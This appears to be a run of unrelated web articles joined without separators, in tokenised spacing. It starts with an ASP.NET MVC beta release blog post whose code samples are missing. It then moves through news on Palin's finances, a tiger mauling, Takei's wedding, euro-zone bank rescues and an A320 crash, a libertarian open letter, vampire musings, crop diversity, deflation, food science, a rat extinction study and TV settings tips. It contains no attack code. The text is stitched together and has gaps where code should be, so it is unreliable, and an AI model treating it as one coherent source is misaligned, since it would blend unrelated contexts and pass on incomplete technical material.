Built - in Model Binder support for Complex Types
Preview 5 introduced the concept of " model binders " - which allow you to map incoming form post values to complex .NET types passed as Controller action method parameters .
Model binders in preview 5 were extensible , and you could create custom binders and register them at multiple levels of the system .
Preview 5 did n't ship with any " pre-built " binders , though , that you could use out of the box ( you instead had to build your own ) .
Today 's beta now includes a built - in , pre-registered , binder that can be used to automatically handle standard .NET types - without requiring any additional code or registration .
For example , we can now create a " Person " class like below with standard properties :
And then have a Controller action method take it as an parameter argument simply by writing the code below :
Because the argument parameter above is named " person " , the model binder will by default look for form - post values whose key names are in the format " person .
Name " , " person .
Age " , " person . Email " .
It will then use these values to create and populate a new " Person " object that is passed into our action method .
Developers can optionally override the default name mapping logic using a new [ Bind ] attribute introduced with today 's beta - and by setting its " Prefix " property .
For example , if we set the prefix property to " PersonToSave " , the binder would instead look for the following form values : " PersonToSave . Name " , " PersonToSave . Age " , and " PersonToSave . Email " when creating the person instance .
You can set the prefix to an empty string to have the binder map " Name " , " Age " and " Email " with no prefix :
The [ Bind ] attribute allows you to optionally specify an " Included " or " Excluded " property - which can be used to either " whitelist " or " blacklist " properties from being mapped on the objects .
For example , the code below indicates that we want to map only the " Name " and " Age " properties on our person object :
Important safety tip :
In general you want to be very careful to make sure you do n't allow properties to be mapped that you do n't want mapped .
Always use include / exclude anytime you have properties that you do n't want to be mapped on an object .
For example : assuming there was a " Salary " property on our Person object - we would not want to map it unless we explicitly wanted an end - user to be able to set it .
You want to be explicit about not mapping unwanted properties like this to prevent a hacker from trying to fake out a form request and attempting to submit additional property information not editable in the UI .
Refactored Model Binder Infrastructure
The model binder system has been refactored significantly for the beta .
You can now re-use and plug - in functionality in a much more granular fashion when building your own custom model binders .
Model binders are also now used by the UpdateModel and TryUpdateModel methods - allowing you to write one binder and re-use it everywhere any form value is handled inside ASP .
NET MVC .
Improved UpdateModel and TryUpdateModel methods
The UpdateModel and TryUpdateModel methods now support several new options and overloads ( including richer whitelist and blacklist options ) .
It also now optionally supports the ability to just call " UpdateModel " to populate an instance with the default binding rules ( with preview 5 you always had to supply a whitelist - and several people asked for an option to just map all ) :
Another new feature in today 's beta is the ability to define a strongly - typed whitelist filter that you use with UpdateModel / TryUpdateModel .
You can do this by defining an interface with the subset of bindable properties that you want to map .
For example , below I 'm defining a " IPersonFormBindable " interface that only has three properties ( and does not have the salary property ) :
We could then indicate that we want to use this contract to limit which properties are mapped using code like below :
This will ensure that only those properties defined on the IPersonFormBindable interface are mapped - and that the Salary one is not mapped .
Improved Unit Testing of UpdateModel and TryUpdateModel Scenarios
With Preview 5 you had to use mocking in order to unit test form post scenarios that used the UpdateModel or TryUpdateModel methods .
Today 's beta now allows you to unit test all form post scenarios without ever requiring mocking ( which enables better friction - free unit testing ) .
There is a new IValueProvider interface introduced with today 's beta that the model binding infrastructure uses to retrieve values to bind ( as opposed to always going against the request object ) .
The FormCollection class ( which is built - into the beta ) implements this interface - and you can now explicitly pass an instance of this to UpdateModel / TryUpdateModel to bind its values from .
For example : below in the " Save " action method we are binding all incoming form values to a FormCollection ( which will be passed in as an argument to the action method ) .
I can then pass this form collection to the UpdateModel call and have it map the values onto the person model object using this parameter :
We could then unit test a successful form post scenario for the above action method using the code below ( notice how we do n't need to mock anything - instead we can just create a formcollection , populate it , and pass it as a parameter ) :
We could then unit test an unsuccessful form post ( which fails because of invalid input for the age value ) using the code below .
Notice how we are verifying that the edit form is redisplayed ( so that users can correct their problem ) in a form - post failure scenario :
We did not have to mock anything to unit test both of the above form submission scenarios .
Strongly Typed [ AcceptVerbs ] attribute
ASP .NET MVC Preview 5 introduced a new [ AcceptVerbs ] attribute that you could use to indicate which HTTP verbs an action method supported .
In preview 5 you always specified verbs using strings .
We still support this with the beta , but have also added support for common verbs to be specified using a strongly - typed enum mask .
For example :
Today 's beta release also no longer requires that you specify [ AcceptVerbs ] on both actions in scenarios like above .
By default ASP .
NET MVC now looks for an action method that explicitly supports the incoming http verb - and if one is not found will use the action method that does n't have an explicit verb specified .
This saves some typing for common GET / POST scenarios ( you no longer need to decorate the GET method ) .
Validation Error Messages
One of the features that unfortunately did not make it into the beta ( but which we will add for the next update ) is support so that you can expose custom error validation messages from your model classes ( as opposed to customizing them in the Controller like you can do today ) .
We are currently investigating a few ways to enable this - including adding support for the IDataErrorInfo interface , as well as support for the new Dynamic Data attributes in the System.ComponentModel.DataAnnotations namespace .
One improvement that did make it into today 's beta , though , is that the default validation error messages are now more end - user friendly ( which hopefully eliminates the need to define custom validation messages in a lot of cases ) :
HTML Helper Cleanup
Today 's beta has some miscellaneous cleanup improvements to the HTML helpers ( in general this is a tricky area - since there are so many overload combinations to get right ) .
Html.Form -> Html.BeginForm
One of the usability changes made with today 's beta was to rename Html. Form ( ) to Html. BeginForm ( ) and to support two modes of using it - one leveraging a using statement , and the other leveraging an explicit Html. EndForm ( ) helper method .
The reason we 've moved to support both of these approaches is that we 've seen a lot of questions / confusion in the forums around how the using statement works for this scenario ( the pattern is unfamiliar to a lot of developers ) .
Below are two examples that demonstrate how we can implement the above create screen scenario ( complete with validation error message UI ) using the two different form approaches :
Approach 1 : Using Statement with Html.BeginForm ( ) :
The below approach uses the IDisposable pattern with the using keyword in VB and C# to auto - terminate the </ form > :
Approach 2 : Explicit Html.BeginForm ( ) and Html.EndForm ( ) :
The below approach uses an explicit EndForm ( ) call to close the </ form > :
Developers can use whichever they feel most comfortable with - both approaches logically do the exact same thing .
Many HTML Helper Methods Moved to be Extension Methods
One change we made with today 's beta was to move many of the Html helper methods to be extension methods that live under the System .
Web.
Mvc.
Html namespace ( previously they were just instance methods on the HtmlHelper class ) .
We did a similar thing with the AJAX helper methods in " Preview 5 " ( they now live in the System .
Web.Mvc.Ajax namespace ) .
These changes do n't impact intellisense in the view markup ( we by default automatically reference the namespace in the web.
config file so it works just like before - although if you are migrating an app from preview 5 you 'll need to add the namespace yourself to web.config , read the release notes for steps on how to - do this ) .
If you have standalone classes / tests that use the helper methods make sure to add the appropriate " using " statement to import them .
The reason we moved the helper methods to be extension methods instead of instance methods was to provide developers with more flexibility to add / remove / replace our built - in implementations ( as well as to give ourselves more flexibility in the future ) .
If you want to override the HTML rendering of a method you can now easily do so - and still keep the same method code / signature in your markup .
Silverlight / ASP.NET MVC Project Integration
When you create a new Silverlight 2 project within Visual Studio or Visual Web Developer 2008 Express ( using the recently released Silverlight 2 and VS 2008 Tools for Silverlight download ) , you now have the ability to select a ASP .
NET Web Site , ASP.
NET Web Application Project and now an ASP .
NET MVC Project to host it within :
When you choose this option , Visual Studio will automatically copy and deploy / update the Silverlight application into the ASP .
NET MVC application when you make a change and do a build within the IDE .
This makes it easier to start integrating a .NET based Silverlight front - end ( running inside the browser ) with an ASP .
NET MVC web backend - and opens up some interesting new possibilities .
ASP.NET MVC Futures Assembly
For the last several preview releases , ASP .
NET MVC features have been split across two assemblies - System .
Web.
Mvc.dll and Microsoft.Web.Mvc.dll .
The later assembly + namespace contains " futures " features that had n't yet been committed to ship in the core V1 product .
As features become " committed " we move them from the futures assembly into the core assembly - and also change the namespace ( from Microsoft .
Web.Mvc to System.Web.Mvc ) .
The previous preview releases automatically shipped and added the " futures " assembly when you did a File -> New ASP.NET MVC project .
Starting with today 's beta we are no longer automatically adding this assembly - instead you need to explicitly add it from your project if you want to use it .
The reason for this is so that developers can clearly distinguish those features that will be in the fully supported V1 product ( which implies product support and a higher commitment around backwards compatibility ) , and those that might still evolve in the future ( and not be added to the supported product until vnext ) .
Important : the futures assembly ( along with all the source code in it ) will continue to ship and will work with ASP .
NET MVC V1 .
So if there is a feature in it you really like , you do not have to worry about it disappearing on you ( it is still there and you can still use it ) .
You just now need to explicitly reference the assembly and use it in your project .
We plan to ship a version of the ASP .
NET MVC Futures assembly that works with the Beta later today .
You will be able to download it here .
\ Bin and GAC Deployment
The ASP.NET MVC beta now supports both GAC based deployment ( where you install the assembly once for the machine ) as well as local \bin based deployment ( where you store a copy of the assembly in the application directory ) .
We will use the GAC to enable automatic - servicing updates via Windows Update ( where an administrator can automatically patch a machine - like they do with the rest of the .
NET Framework today , and not have to update each individual application ) .
One downside with GAC based deployment , though , is that it can make deploying applications that require a GAC component harder for hosted scenarios - since you typically do not have admin access on the server machine ( and you need admin rights to install components in the GAC ) .
To make sure hosted scenarios work well ( and to ensure that you do n't need your hoster to install anything other that ASP.
NET 3.5 in order for ASP.
NET MVC to work ) , we will also support the ability to deploy the ASP .
NET MVC framework assemblies in the \bin directory of your application .
This will allow you to just xcopy / ftp the application onto the server and have it work ( no admin access or setup needs to be run on it ) .
The one caveat with this is that you 'll be responsible for updating the assembly anytime a servicing update comes out - Windows Update can't automatically find all the application directories on a machine to - do this for you .
Summary
Today 's beta release is a step closer to the final ASP .
NET MVC 1.0 product .
While not 100 % feature complete , we think the major subsystems are all getting really close to being done , and that the quality level is now pretty good .
I am going to try and post some more end - to - end tutorials in the coming weeks that show off how to use ASP .
NET MVC from the beginning , and then logically progress to richer and richer scenarios .
Included in the list of tutorials will be my infamous AJAX with MVC post that I keep promising to write - but so far have n't ( my excuse : the Silverlight 2 , ASP.
NET MVC , .NET 4.0 , VS10 , and Windows 7 ship cycles are all happening in parallel on my team - and I 've unfortunately been really busy which is the reason for the delay ) .
As I always like to make sure I point out :
If you do n't like the MVC model or do n't find it natural to your style of development , you definitely do n't have to use it .
It is a totally optional offering - and does not replace the existing WebForms model .
Both WebForms and MVC will be fully supported and enhanced going forward ( ASP .
NET WebForms in .NET 4.0 will add richer URL routing features , better HTML css markup support , complete control over the Client Id property , more AJAX features , and more that I 'll be blogging about soon ) .
So if you do n't like the MVC option , do n't worry , and do n't feel like you should or need to use it ( you do n't ) .
Hope this helps ,
Scott
Records : Palin has plenty in bank Agence France - Presse
Published : Friday October 3 , 2008
Print This Email This Sarah Palin , who regularly tells voters she knows what it is like to struggle to pay the bills , earns nearly 200,000 and has substantial savings , according to records released by the Republican vice presidential hopeful 's campaign Friday .
Palin , who took office as governor of Alaska in December 2006 , reported a gross household income of 166,495 in her 2007 taxes .
Her financial disclosure report to the office of government ethics showed her income to be 196,531.50 this year and did not list how much her husband earned working in the oilfields or as a commercial fisherman .
The couple 's 2007 taxes showed Todd 's fishing business brought in about 50,000 dollars , more than half of which went to paying expenses .
His snowmachine racing also earned him about 17,000 in 2007 but he spent nearly 10,000 more than that on equipment and other related expenses .
They had a taxable income of 124,921 in 2007 .
The couple claimed eight investment funds with a value of between 15,001 and 50,000 dollars and seven others valued at between 1,001 and 15,000 in a financial disclosure report .
Todd Palin also had a retirement fund through work valued at between 50,001 and 100,000 while Sarah Palin's two pensions from her work as the Governor of Alaska and mayor of Wasilla were also valued in that range .
Their home was valued at between 500,001 and a million dollars , and they also have a partial interest in two parcels of land and own a fishing leasehold .
Todd Palin claimed three vehicles which were used for business purposes : a 1992 truck , a 1975 Ford and a 2006 Dodge .
Palin , who insists that taxes must be lowered to help stimulate the economy and put more money into the pockets of families , paid 24,738 last year on her family 's adjusted gross income of 166,080 : a 14.3 percent tax rate .
For 2006 , the Palins paid 11,944 in total taxes on gross income of 127,869 dollars , which is a 9.3 percent tax rate .
The family donated 1.5 percent of their income to charity in 2007 , of which 2,500 dollars was cash and 825 dollars was household goods donated to the Salvation Army .
This was down from the 3.3 percent of their adjusted gross income donated in 2006 , of which 4,250 was cash and 630 dollars was household goods .
If you analyze it I believe the very heart and soul of conservatism is libertarianism [ … ]
The basis of conservatism is a desire for less government interference or less centralized authority or more individual freedom and this is a pretty general description also of what libertarianism is .
– Ronald Reagan ( 1975 )
For the second election in a row , you find yourselves on the losing end .
A significant majority of Americans have lost confidence in you and your lack of vision .
As you debate amongst yourselves the reasons why you lost the White House as well as numerous seats in both houses of Congress , perhaps this former Republican who has flirted with the Libertarian Party * over the last decade can offer you some helpful advice and constructive criticism .
While I do not presume to speak on behalf of the many thousands of disillusioned former libertarian - leaning small government Republicans who were once a valued voting bloc in Ronald Reagan ’s “ conservative coalition , ” I am quite certain that there are many others who would agree with my appraisal of why you find yourselves in the position you are in .
President - Elect Barack Obama is wrong about a great many things but one thing he ( and his party ) has which you do not is clearly defined principles and the ability to communicate these principles effectively .
I know what the Democratic Party stands for , what does the Republican Party stand for ?
I know what the modern meanings of the terms “ liberal ” and “ progressive ” mean , but I have no idea what the modern meaning of the term “ conservative ” means .
I have recently seen polls which ask the following question :
The Republicans lost the election because a .
The Republican Party is too conservative b.
The Republican Party is not conservative enough
I find this question to be impossible to answer !
If by “ conservative ” one means a party which appeals almost exclusively to white Christian male culture warriors whose primary agenda is using the police power of government to accomplish desired political goals , then my answer would be “ a . ”
If by “ conservative ” one means promoting the rights of life , liberty , and property then clearly , my answer would be “ b . ”
I do not believe the ambiguity of the term “ conservative ” is by accident .
“ Conservative ” is every bit the nebulous term as we have heard ad nauseam from the Obama campaign ( i.e. “ hope ” and “ change ” ) .
Because these terms are so under defined , each person who hears these buzzwords assigns his or her own meaning to them .
I seem to recall every candidate in the Republican primary refer to himself as a “ conservative ” or even a “ Reagan conservative ” at one time or another .
How is it possible that candidates with philosophical differences as stark as that of Ron Paul and Rudy Giuliani both claim to be conservative ?
Now that I have pointed out your apparent error of asking the wrong question ( garbage in , garbage out right ? ) to try to regain the trust of a majority of voters , I believe it is time for you to explain what exactly a conservative is .
My understanding of the term is more in line with what Barry Goldwater described in Conscience of a Conservative ** as opposed to what the Republican Party has offered in the 2000 , 2002 , 2004 , 2006 , and 2008 campaigns .
I realize that a political party cannot be all things to all people but all of your constituents deserve to have a clear understanding of where your party is going .
Does this mean that moving forward that you will have to choose between two very large voting blocs – small government conservatives and social conservatives ?
This depends completely on how you choose to frame the issues .
Where the Republican Party seems to stand now is that government can and should be used to force individuals to behave a certain way ***.
This approach is completely at odds with the small government conservative approach that undesirable behavior can be changed with the power of persuasion **** rather than force .
Is it possible that the Libertarian Party has an approach that a majority of social conservatives could live with ?
Perhaps you could learn something from The 2008 Libertarian Party Platform :
( From the Preamble ) As Libertarians , we seek a world of liberty ; a world in which all individuals are sovereign over their own lives and no one is forced to sacrifice his or her values for the benefit of others .
We believe that respect for individual rights is the essential precondition for a free and prosperous world , that force and fraud must be banished from human relationships , and that only through freedom can peace and prosperity be realized .
Consequently , we defend each person ’s right to engage in any activity that is peaceful and honest , and welcome the diversity that freedom brings .
The world we seek to build is one where individuals are free to follow their own dreams in their own ways , without interference from government or any authoritarian power .
This approach to governance that the Libertarian Party offers is why I have left the Republican Party and voted accordingly .
Thus far , I have not seen any evidence that your party will become the party of smaller government , lower taxes , and more freedom .
Some of the names I have heard bandied about as the “ new face ” of the Republican Party such as Mitt “ Romney Care ” Romney , Sarah “ I can see Russia from my house ” Palin , and “ Tax Hike Mike ” Huckabee suggests that you are yet to learn why small government conservatives are leaving in droves .
This is not to say that you will continue to lose every election until you return Goldwater / Reagan conservatism .
There is a good chance that you will regain one or both houses of Congress in 2010 and perhaps the presidency in 2012 *****.
But if you wish to win elections and stay elected , you will need to return to these philosophical roots .
Until that day comes , I will continue to support the Libertarian Party and only support Republicans who demonstrate in word and deed their wishes to shrink the size , scope , and power of government .
* And has recently joined the Libertarian Party and voted for another Republican turned Libertarian ( Bob Barr ) for president in this election .
** I would recommend everyone in a leadership capacity of the G.O.P. to read this book .
I am certain that all of you have it on a shelf collecting dust and cobwebs .
I would also recommend Ayn Rand ’s Atlas Shrugged ( read John Galt ’s speech if nothing else ) to learn why lovers of liberty such as myself were very turned off by the McCain campaign ’s collectivist references to “ a cause greater than self , ” “ sacrifice , ” and “ the common good . ”
*** Abortion , end of life issues ( right to die with dignity ) , gay marriage , gambling , drug use , prostitution , blue laws , etc. are all examples of personal choices that social conservatives believe should be regulated or abolished .
**** Persuasion as in convincing individuals to make a different choice with a compelling argument .
No matter how much one tries whether using persuasion or force , not everyone will make the “ right ” decision .
This is a fact of life we need to learn to deal with .
*****
Due to the unrealistically high expectations Obama set for himself , many of his supporters will be sorely disappointed when they learn he is a mere mortal .
I also believe the Democrats will overreach and try to take the country further to the Left than a majority of Americans are prepared for .
Raw cell phone video : November 13/08 , Singapore .
SINGAPORE :
Three white tigers mauled a Malaysian to death in Singapore 's zoo on Thursday after the man jumped into their enclosure , a zoo official said .
Nordin Bin Montong , 32 , a Malaysian working as a cleaner at the zoo , leapt into the moat of the white tiger exhibit and was attacked , said Biswajit Guha , assistant director of zoology at the Singapore Zoo in a statement .
The noise from the attack caught the attention of zookeepers nearby and they eventually managed to distract the tigers and rescue Nordin .
" Keepers managed to separate the worker from the tiger .
While waiting for the ambulance , our vets attended to him , " said Guha .
" The worker tragically succumbed to his wound .
" Singapore 's Straits
Times newspaper said on its website that Nordin was seen behaving in an agitated manner before he fell into the moat .
Terrified visitors near the section watched the vicious attack in horror and screamed , the paper said .
I would say that Vampires , if they were real , would convert all the nourishment that they take in to energy and do not have the need to do something like urinate .
I get this from the myth that vampires take on life like qualities of losing their pale skin tone and death like appearance after feeding .
Since a vampire can not turn food in to waste , it would be incapable of eating as we understand it .
As for vampires and reproduction .
I would say that a male vampire would be incapable of the sexual act , little on reproduction , ( Though folklore does have many stories of Dhampir half human and half vampires , so someone historically thought they could reproduce ) .
It is a great irony that we attribute such a sexy image on a creature that would basically be eunuch .
Now on the and such category .
If they are dead being they would not secrete the oils that are recovered as latent fingerprints , making vampires excellent thieves .
The average person , roaming supermarket aisles with their trolley , is under the impression that our modern globalised food production system , despite being damaging in every other respect , brings one major benefit to consumers — that being more food choices .
Wrong .
It ’s a myth .
The corporate takeover of agriculture is seeing a rapid and systematic decline in seed and crop diversity , as they seek to standardise all aspects of global food trade .
This means that plants that have been developed and optimised for specific micro-climates and soil conditions over thousands of years are vanishing — fast , and forever .
That ’s what makes the work of Stephan Fayon , who directs an international seed bank in Auroville , India , so significant .
Check out this inspiring clip on his work :
It might be argued that , the issue of unnecessary transport aside , an increase in trade invariably leads to increased choice for consumers .
After all , are not consumers now exposed to all kinds of new and exotic foods in their supermarket , foods that cannot be produced locally ?
While in a sense this is true , the reality is that the purported diversity offered by the global economy and its supermarkets is based on modes of production that are condemning producers to monoculture .
The perceived expansion of choice obscures a startling loss in real diversity .
Whereas a few decades ago , one could find more than a dozen varieties of apple or tomato in the local market , today there are typically just three or four .
These are the same three or four varieties that you would find in a supermarket on the other side of the country , or on another continent – the few select varieties that have the characteristics that are most conducive to the demands of long - distance transport .
As part of this process the diverse cheeses from France , the apple varieties of Devon and the olive groves of Andalusia are progressively being replaced by standardised hybrids , to suit the long distance , large scale marketplace .
Examples of the once - famed range of more than 200 regional English apples are now a rarity in English shopping baskets – an example of what ‘ choice ’ actually means in the global economy .
This lack of real diversity at the market is mirrored in an increasing number of the world ’s agricultural fields .
The consequence of more and more farmers orienting their production towards far - away markets has been a startling loss in agricultural biodiversity .
In China , of the 10,000 wheat varieties in use in 1949 , only 1,000 remained in the 1970s .
In the US , 95 per cent of the cabbage , 91 per cent of the field maize , 94 per cent of the pea , and 81 per cent of the tomato varieties have been lost .
According to the UN Food and Agriculture Organisation ( FAO ) , approximately 75 per cent of the world ’s agricultural diversity has been lost in the last century .
The implications of this trend for food security are ominous .
Not only are there fewer kinds of foods being raised and eaten around the world , but diversity within the few remaining staples is being lost as well .
Since a field planted in monoculture is more susceptible to devastation by pests and blight , the risks rise exponentially when much of the entire planet ’s arable land is planted in virtually identical strains .
In 1970 , for example , 80 per cent of the corn planted in the US shared a common genetic heritage .
When a maze blight struck , it quickly destroyed more than 10 million acres of corn .
— From the Ground Up. Rethinking Industrial Agriculture , p. xvii – xviii , by Helena Norberg - Hodge / Peter Goering / John Page
It ’s that old short - term thinking thing happening again .
Just so a few large agribusinesses can make a killing in the market , we ’re rushing headlong towards major vulnerability with our most basic of needs — food .
Just like with cloned animals , genetic uniformity equates to natural , and social , instability .
Reduced diversity has broad reaching impacts on our world and also our personal health .
With cloned animals we could essentially end up with people eating ‘ the same cow ’ all their lives .
With monocrop farming , the result is similar – “ Astonishingly , a full 95 percent of the calories we eat come from only 30 varieties of plants , according to the FAO . ” ( Alternet ) .
“ I have heard . . . that people may become dependent on us for food .
I know that was not supposed to be good news .
To me that was good news , because before people can do anything they have got to eat .
And if you are looking for a way to get people to lean on you and to be dependent on you , in terms of their cooperation with you , it seems to me that food dependence would be terrific .
— Senator Hubert H. Humphrey , in naming US Public Law 480 the “ Food for Peace ” program , Wall Street Journal , May 7 , 1982
The hope of the industry is that over time the market is so flooded [ with GMOs ] that there ’s nothing you can do about it .
You just sort of surrender .
— Don Westfall , biotech industry consultant and vice - president of Promar International , Toronto Star
Supporting local farms , particularly those that concentrate on crop diversity and soil health , is one way you can help reverse this trend .
The value of what we are losing cannot be measured .
As dozens of countries slip deeper into financial distress , a new threat may be gathering force within the American economy  the prospect that goods will pile up waiting for buyers and prices will fall , suffocating fresh investment and worsening joblessness for months or even years .
The word for this is deflation , or declining prices , a term that gives economists chills .
Deflation accompanied the Depression of the 1930s .
Persistently falling prices also were at the heart of Japan ’s so - called lost decade after the catastrophic collapse of its real estate bubble at the end of the 1980s  a period in which some experts now find parallels to the American predicament .
“ That certainly is the snapshot of the risk I see , ” said Robert J. Barbera , chief economist at the research and trading firm ITG .
“ It is the crisis we face . ”
With economies around the globe weakening , demand for oil , copper , grains and other commodities has diminished , bringing down prices of these raw materials .
But prices have yet to decline noticeably for most goods and services , with one conspicuous exception  houses .
Still , reduced demand is beginning to soften prices for a few products , like furniture and bedding , which are down slightly since the beginning of 2007 , according to government data .
Prices are also falling for some appliances , tools and hardware .
20 of the Best Comedies on Hulu That Will Have You Bent Over With Laughter
If laughter is the best medicine , then these funny movies are just what the doctor ordered .
The couple were joined by Takei's Star Trek co-stars at the wedding
Former Star Trek actor George Takei has married his long - term partner in a Buddhist ceremony in Los Angeles .
Takei , 71 , who played Mr Sulu in the sci - fi series , married business manager Brad Altman , 54 , in front of a number of his Star Trek co-stars .
They included best man Walter Koenig , who played Chekhov , and matron - of - honour Nichelle Nichols - Uhura .
The wedding - at Japanese American National Museum - came after California lifted a ban on same - sex marriage .
The couple , who have been together for 21 years , wore matching white tuxedos in the ceremony .
Takei , who recently appeared in US TV show Heroes , said in his vows that Altman was " an organised , detailed - obsessed , punctuality - driven control freak " .
" I'm easygoing so we 're a good fit , " he added .
Speaking before the ceremony , Takei said : " We have a relationship that 's been stronger and longer - lived than some of our straight friends and yet we were not equal .
" What this does is give us that dignity . "
The couple were among the first Californian couples to receive a wedding licence when the state lifted its same - sex marriage ban on 17 June .
“ There is no question of setting up a European fund , ” he said .
Announcements last week by Britain and the United States that they would move to take ownership shares in ailing banks , the 15 leaders of the countries that use the euro found themselves looking for a collective response to avoid tit - for - tat actions by individual countries that might harm their neighbors .
Mr. Brown said earlier after meeting at the Elysée Palace with Mr. Sarkozy , that he believed Europe would “ work together with America . ” Mr. Brown , whose country has maintained its own currency , the pound , also warned that the decisions made Sunday would have economic consequences for years to come .
In contrast to the meeting last weekend , European leaders on Sunday seemed to be reading from the same script .
“ Our goal is to have coordinated action for the euro zone , ” Angela Merkel , the German chancellor , said , and the meeting “ is a very important signal for the strength of the euro zone . ”
Germany is considering a plan to inject 50 billion to 100 billion euros into its banks , with a price tag for all of the new measures reaching as much as 400 billion euros , or $ 536 billion , according to a person briefed on the government ’s work .
A German official cautioned that the numbers remained speculative .
Current plans are to have the package approved by the cabinet on Monday and through the German Parliament this week .
France is expected to announce a two - pronged plan aimed at safeguarding the solvency of French banks and jump - start lending between financial institution , according to a senior official who has worked on the plan .
Moments ago , the Texas Freedom Network posted to its Web site a study conducted by Dr. Raymond Eve , a professor of sociology and anthropology at the University of Texas at Arlington , titled Evolution , Creationism & Public Schools : Surveying What Texas Scientists
Think about Educating Our Kids in the 21st Century .
It reveals the results of a survey sent to biology and " biological anthropology " faculty members from " all 35 public universities plus the 15 largest private institutions in Texas , " in which they were asked to take the following taste test : evolution or intelligent design ?
As Eve writes in the introduction , the reason for the survey was simple :
" In the spring of 2009 , the Texas State Board of Education will vote to adopt new curriculum standards for the teaching of science in grades K – 12 in Texas public schools .
( These guidelines are formally known as the Texas Essential Knowledge and Skills , or TEKS . )
Many observers , both within Texas and around the country , anticipate a vigorous push by certain interest groups to make the debate over the Texas science curriculum the latest front in the running battle over evolution . "
So Eve , and the TFN , wanted to see where educators stood on the issue .
Oof the 1,019 faculty members to whom the surveys were sent , 464 responded -- and fewer than 1 percent checked off the box marked , “ Modern evolutionary biology is mostly wrong .
Life arose through multiple creation events by an intelligent designer , although evolution by natural selection played a limited role . ”
In other words : Do the evolution .
Now might be a good time to re-read Jesse Hyde 's March 2008 cover story on the subject .
-- Robert Wilonsky
“ It ’s not really about culinary excellence , the way someone who wanted to make better bread might experiment with floor tile and firebrick in their oven , ” said Patrick Buckley , a mechanical engineer who has collected 20 food - science projects into a new book , “ The Hungry Scientist Handbook ” ( Collins Living ) , with Lily Binns , a food writer .
“ It ’s about seeing if something can be done .
And even if you fail , you ’ve learned something  just like in the lab . ”
Image THINK , THEN EAT Malted milk ball eyes atop a noodle monster .
Credit ... Windell Oskay
Any cook who has pulled a fallen cake out of the oven or tried to speed - cook short ribs has encountered the immutable laws of food science .
And among the most revered chefs working today are those who embrace the kitchen as a laboratory , like Heston Blumenthal , Ferran Adrià and Thomas Keller .
But some professional scientists ( and a few amateur lab rats ) are taking the research in a different direction .
Rather than scenting mozzarella cheese with rose petals , they ’re sticking metal forks into hot dogs and cooking them by electrocution .
They ’re using Play - Doh extruders to make pixelated sugar cookies .
More high - school science fair than hushed temple of flavor , this subculture embraces projects that are big , loud , dangerous , smoking , absurdly time - consuming and seemingly pointless  although the process is treated with great solemnity .
As a cook might taste a sauce and draw on a lifetime of flavor memory and experience to figure out what it needs  acid , sugar , salt , fat ?
 these scientists draw on laboratory experience and academic training to answer arcane questions such as :
What is the best way to fling marshmallows over a long distance ?
Rescue teams now say there is “ no hope of survivors ” from an Airbus A320 crash in the Mediterranean Sea .
The Airbus A320 jet , owned by Air New Zealand , went down into the water at approximately 4 p.m. GMT , according to various reports from the region .
Seven people were on - board .
At least two bodies have been recovered so far .
[ Airbus A320 : Past Crashes ( VIDEO ) ]
The plane was on a maintenance - related test flight , and investigators believe everyone on - board was a pilot , airline employee , or aircraft maintenance worker from New Zealand .
The crash occurred about 12.5 miles east of the city of Perpignan , close to the Spain border in southern France .
Searchers have discovered some pieces of floating debris spread over a wide area of the water .
It ’s not yet clear , though , what caused the crash .
The Airbus A320 was operated by a German charter airline called XL Airways , according to the Associated Press .
The charter had been leasing the plane from Air New Zealand since 2006 , the AP reports , and was preparing to return it to the airline next month .
In an eerie coincidence , the Airbus A320 crash is within days of the anniversary of New Zealand ’s deadliest air disaster .
Air New Zealand flight 901 crashed into Mount Erebus on November 28 , 1979 .
The plane disintegrated , killing all 237 passengers and 20 crew members on - board .
• More about past crashes involving Airbus A320 aircraft ( VIDEO )
• More about the Airbus A320 ’s design
Disease can drive a mammal species to extinction : this does n't seem surprising , but until today it had n't been proven .
And now that it has , members of our own mammalian species might understandably feel uneasy .
The extinction in question took place a century ago on Christmas Island , an uninhabited Indian Ocean atoll to which a merchant ship inadvertently carried flea - ridden black rats .
Within a decade , both of the island 's native rat species were extinct .
Scientists have argued whether the native rats were outcompeted by the newcomers , or fell victim to diseases carried by the fleas .
According to DNA analysis of remaining native rat specimens , infection was widespread within the population after contact , and nonexistent before — suggesting that disease caused the die - off .
Resolving this argument has implications for another debate , over the hypothesis that disease can be so lethal and contagious as to drive a mammal species extinct .
This had been observed in snails and amphibians , but not in mammals .
The authors of the study , published today in Public Library of Science ONE , hope conservationists will take heed : accidentally - introduced pathogens could wipe out endangered species .
But to me , the findings also have human implications .
Some would say that the rats were vulnerable because they lived on an island ; but the Earth is an island , too .
Historical Mammal Extinction on Christmas Island ( Indian Ocean ) Correlates with Introduced Infectious Disease [ PLoS ONE ]
* Image : PLoS ONE
*
WiSci 2.0 : Brandon Keim's Twitter stream and Del.icio.us feed ; Wired Science on Facebook .
This article explains some of the difficulties and biases women face in the Linux community and examines various strategies for addressing those difficulties in order to encourage more participation by women .
Home Theater 101 : How to Adjust Your TV Settings for a Better Viewing Experience
People across the United States spend , on average , 6 hours per day watching video .
This video watching takes place across a variety of screens including computers , mobile phones , and of course on big screen televisions .
While we wo n’t be diving into mobile phones or computer monitors today , we will be breaking down a few simple ways you can improve the look of that massive TV you ’re showing off in your family room .
Here ’s the thing , your television is packed with hundreds of TV settings you ’re probably going to ignore .
You know , those settings you see when you accidentally hit the “ menu ” button on your remote ?
The truth is though that some of those settings are making or breaking your viewing experience .
Below , we outline some of the most important TV settings that are worth your time so you can get the most bang for your TV viewing buck !
1. Picture Mode
It ’s important to note that all TVs are different so the options on your TV may be titled a little different than how we title them in this article .
If your TV is like most though , chances are you have a picture mode setting that gives you options like “ cinema ” or “ live ” .
These are pre-baked configurations that can give you a good baseline to work from .
Go ahead and choose “ cinema ” or “ movie ” mode before moving on .
2. Edge Replacement
Sometimes the quality of your TVs picture can seem soft .
This may be particularly true when your TV is trying to process an image that ’s of higher quality than it can natively output ( for example , streaming 4 K video on a standard HD television ) .
To help add some sharpness to the image , there is an Edge Replacement feature in your TV settings that you ’ll want to balance out .
If you ’re too aggressive with Edge Replacement , you ’ll notice a halo effect on your image that you probably wo n’t like .
Do your best to find a happy medium .
3. HDR + Mode
HDR +
Mode introduces more dynamic tones in colors which can make images appear vibrant and saturated .
This feature may also be titled “ Live Color ” on your TV .
Depending on your taste , you may want to turn these features off .
When off , images will appear more true to life .
If you ’re not a fan of the dull colors of reality , feel free to keep this setting on .
4. Motion Interpolation
Have you ever seen the “ soap opera ” effect where images seem so real that it feels like you ’re standing on set ?
This effect is particularly prevalent with Blu Ray movies .
